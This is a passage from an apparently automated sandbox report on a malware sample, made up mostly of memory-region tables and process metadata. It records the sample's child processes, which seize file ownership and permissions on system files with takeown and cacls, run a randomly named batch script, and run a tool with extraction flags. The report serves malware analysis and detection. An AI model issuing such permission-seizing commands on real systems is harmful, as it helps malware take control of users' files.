|
|
- |
| pagefile_0x0000000000cd0000 | 0x00cd0000 | 0x00cdffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000ce0000 | 0x00ce0000 | 0x00ce3fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000cf0000 | 0x00cf0000 | 0x00cf1fff | Private Memory | rw |
|
|
|
- |
| takeown.exe.mui | 0x00cf0000 | 0x00cf4fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000000d00000 | 0x00d00000 | 0x00d13fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000d20000 | 0x00d20000 | 0x00d5ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000d60000 | 0x00d60000 | 0x00d9ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000da0000 | 0x00da0000 | 0x00da3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000db0000 | 0x00db0000 | 0x00db0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000dc0000 | 0x00dc0000 | 0x00dc1fff | Private Memory | rw |
|
|
|
- |
| imm32.dll | 0x00dd0000 | 0x00df9fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000dd0000 | 0x00dd0000 | 0x00dd0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000de0000 | 0x00de0000 | 0x00de0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000e00000 | 0x00e00000 | 0x00e0ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000e10000 | 0x00e10000 | 0x010fffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00e10000 | 0x00ecdfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000ed0000 | 0x00ed0000 | 0x00f0ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000f10000 | 0x00f10000 | 0x00f4ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001000000 | 0x01000000 | 0x010fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001100000 | 0x01100000 | 0x011bffff | Private Memory | rw |
|
|
|
- |
| takeown.exe | 0x01220000 | 0x0122ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000001230000 | 0x01230000 | 0x0522ffff | Pagefile Backed Memory | - |
|
|
|
- |
| pagefile_0x0000000005230000 | 0x05230000 | 0x053b7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000053c0000 | 0x053c0000 | 0x05540fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000005550000 | 0x05550000 | 0x0694ffff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x06950000 | 0x06c86fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x742f0000 | 0x742f7fff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x743a0000 | 0x743c7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74750000 | 0x747a8fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x747b0000 | 0x747b9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x747c0000 | 0x747ddfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x74a00000 | 0x74aabfff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x74da0000 | 0x74de3fff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x74df0000 | 0x74f0ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x74f10000 | 0x74f3afff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x75030000 | 0x7517cfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x76c70000 | 0x76daffff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x772b0000 | 0x772f2fff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x77390000 | 0x77549fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x77550000 | 0x775cafff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007e820000 | 0x7e820000 | 0x7e91ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007e920000 | 0x7e920000 | 0x7e942fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007e947000 | 0x7e947000 | 0x7e947fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e948000 | 0x7e948000 | 0x7e94afff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e94b000 | 0x7e94b000 | 0x7e94dfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e94e000 | 0x7e94e000 | 0x7e94efff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfc57b4ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfc57b50000 | 0x7dfc57b50000 | 0x7ffc57b4ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #249: cacls.exe
0
0
| Information | Value |
|---|---|
| ID | #249 |
| File Name | c:\windows\syswow64\cacls.exe |
| Command Line | cacls "C:\Program Files\Windows Mail\en-US\msoeres.dll.mui" /E /G CIiHmnxMn6Ps:F /C |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:58, Reason: Child Process |
| Unmonitor | End Time: 00:04:02, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:04 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xe20 |
| Parent PID | 0x408 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
888
0x
EE0
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000ce0000 | 0x00ce0000 | 0x00cfffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000ce0000 | 0x00ce0000 | 0x00ceffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000cf0000 | 0x00cf0000 | 0x00cf3fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000d00000 | 0x00d00000 | 0x00d01fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000d00000 | 0x00d00000 | 0x00d03fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000d10000 | 0x00d10000 | 0x00d23fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000d30000 | 0x00d30000 | 0x00d6ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000d70000 | 0x00d70000 | 0x00daffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000db0000 | 0x00db0000 | 0x00db3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000dc0000 | 0x00dc0000 | 0x00dc0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000dd0000 | 0x00dd0000 | 0x00dd1fff | Private Memory | rw |
|
|
|
- |
| cacls.exe.mui | 0x00de0000 | 0x00de1fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000df0000 | 0x00df0000 | 0x00dfffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00e00000 | 0x00ebdfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000ec0000 | 0x00ec0000 | 0x00efffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000f00000 | 0x00f00000 | 0x00f3ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000f40000 | 0x00f40000 | 0x00feffff | Private Memory | rw |
|
|
|
- |
| cacls.exe | 0x01040000 | 0x01049fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000001050000 | 0x01050000 | 0x0504ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000005050000 | 0x05050000 | 0x052bffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x052c0000 | 0x055f6fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x743a0000 | 0x743c7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74750000 | 0x747a8fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x747b0000 | 0x747b9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x747c0000 | 0x747ddfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x74a00000 | 0x74aabfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x772b0000 | 0x772f2fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x77550000 | 0x775cafff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007ebc0000 | 0x7ebc0000 | 0x7ecbffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ecc0000 | 0x7ecc0000 | 0x7ece2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ece4000 | 0x7ece4000 | 0x7ece4fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ece9000 | 0x7ece9000 | 0x7ecebfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ecec000 | 0x7ecec000 | 0x7ececfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007eced000 | 0x7eced000 | 0x7eceffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfc57b4ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfc57b50000 | 0x7dfc57b50000 | 0x7ffc57b4ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #250: cmd.exe
41
0
| Information | Value |
|---|---|
| ID | #250 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\Windows\system32\cmd.exe /c ""C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat" "C:\Program Files\Windows Journal\Templates\Dotted_Line.jtp"" |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:59, Reason: Child Process |
| Unmonitor | End Time: 00:04:02, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:03 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xfbc |
| Parent PID | 0xa70 (c:\users\ciihmnxmn6ps\desktop\mngrxc.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
C28
0x
B3C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| cmd.exe | 0x003f0000 | 0x0043ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000440000 | 0x00440000 | 0x0443ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000004440000 | 0x04440000 | 0x0445ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004440000 | 0x04440000 | 0x0444ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000004450000 | 0x04450000 | 0x04453fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004460000 | 0x04460000 | 0x04461fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004470000 | 0x04470000 | 0x04483fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004490000 | 0x04490000 | 0x044cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000044d0000 | 0x044d0000 | 0x045cffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000045d0000 | 0x045d0000 | 0x045d3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000045e0000 | 0x045e0000 | 0x045e0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000045f0000 | 0x045f0000 | 0x045f1fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004600000 | 0x04600000 | 0x0475ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004600000 | 0x04600000 | 0x0463ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004660000 | 0x04660000 | 0x0475ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000047d0000 | 0x047d0000 | 0x047dffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x047e0000 | 0x0489dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000048a0000 | 0x048a0000 | 0x0499ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000049a0000 | 0x049a0000 | 0x04adffff | Private Memory | rw |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007e950000 | 0x7e950000 | 0x7ea4ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ea50000 | 0x7ea50000 | 0x7ea72fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ea73000 | 0x7ea73000 | 0x7ea73fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ea76000 | 0x7ea76000 | 0x7ea76fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ea7a000 | 0x7ea7a000 | 0x7ea7cfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ea7d000 | 0x7ea7d000 | 0x7ea7ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfc57b4ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfc57b50000 | 0x7dfc57b50000 | 0x7ffc57b4ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (7)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop | type = file_attributes |
|
2 | |
| Open | STD_OUTPUT_HANDLE | - |
|
3 | |
| Open | STD_INPUT_HANDLE | - |
|
2 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 225, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Module (4)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x3f0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x74f40000 |
|
1 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x74f82780 |
|
1 |
Environment (11)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
4 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
1 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
1 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\CIiHmnxMn6Ps\Desktop |
|
1 |
Process #251: qry2vco2.exe
175
0
| Information | Value |
|---|---|
| ID | #251 |
| File Name | c:\users\ciihmnxmn6ps\desktop\qry2vco2.exe |
| Command Line | qRY2vco2.exe -accepteula -c Run -y -p extract -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:59, Reason: Child Process |
| Unmonitor | End Time: 00:04:02, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:03 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xc7c |
| Parent PID | 0xde0 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
D98
0x
A84
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00023fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x0009ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000a0000 | 0x000a0000 | 0x0019ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001b0000 | 0x001b0000 | 0x001b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001c1fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x001d0000 | 0x0028dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000290000 | 0x00290000 | 0x002cffff | Private Memory | rw |
|
|
|
- |
| imm32.dll | 0x002d0000 | 0x002f9fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000002d0000 | 0x002d0000 | 0x002d0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000340000 | 0x00340000 | 0x0034ffff | Private Memory | rw |
|
|
|
- |
| qry2vco2.exe | 0x00400000 | 0x00476fff | Memory Mapped File | rwx |
|
|
|
|
| private_0x0000000000480000 | 0x00480000 | 0x0065ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000480000 | 0x00480000 | 0x0055ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000560000 | 0x00560000 | 0x0065ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000660000 | 0x00660000 | 0x0075ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000760000 | 0x00760000 | 0x0087ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000880000 | 0x00880000 | 0x00a07fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000a10000 | 0x00a10000 | 0x00b90fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000ba0000 | 0x00ba0000 | 0x01f9ffff | Pagefile Backed Memory | r |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x74220000 | 0x742b1fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x742f0000 | 0x742f7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74750000 | 0x747a8fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x747b0000 | 0x747b9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x747c0000 | 0x747ddfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x74a00000 | 0x74aabfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x74ab0000 | 0x74abbfff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x74da0000 | 0x74de3fff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x74df0000 | 0x74f0ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x74f10000 | 0x74f3afff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x75030000 | 0x7517cfff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x75180000 | 0x7518efff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x75310000 | 0x766cefff | Memory Mapped File | rwx |
|
|
|
- |
| comdlg32.dll | 0x766d0000 | 0x7678dfff | Memory Mapped File | rwx |
|
|
|
- |
| windows.storage.dll | 0x76790000 | 0x76c6cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x76c70000 | 0x76daffff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x77260000 | 0x772a3fff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x772b0000 | 0x772f2fff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x77300000 | 0x7738cfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x77390000 | 0x77549fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x77550000 | 0x775cafff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007feb0000 | 0x7feb0000 | 0x7ffaffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffd8000 | 0x7ffd8000 | 0x7ffdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdb000 | 0x7ffdb000 | 0x7ffddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ffc57b4ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (8)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIIHMN~1\AppData\Local\Temp\qRY2vco264.exe | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Get Info | STD_INPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 73 |
|
1 |
Module (165)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | KERNEL32.DLL | base_address = 0x74f40000 |
|
1 | |
| Load | ADVAPI32.dll | base_address = 0x77550000 |
|
1 | |
| Load | COMDLG32.dll | base_address = 0x766d0000 |
|
1 | |
